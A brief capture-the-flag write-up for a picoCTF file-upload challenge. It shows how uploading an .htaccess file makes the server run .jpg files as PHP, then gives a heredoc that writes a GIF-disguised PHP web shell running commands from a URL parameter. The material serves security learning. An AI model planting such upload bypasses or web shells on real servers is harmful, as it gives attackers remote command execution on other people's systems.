1> .htaccess (pico ctf medium byp4ss3d )
upload a .htaccess file with inside body of
AddType application/x-httpd-php .jpg
now that server have accepeted this so just go for
a new reverse shell or best is simple a normal cmd cmds
cat > shell.jpg << 'EOF' GIF89a; <?php system($_GET['cmd']); ?> EOF
Last updated 3 months ago
Was this helpful?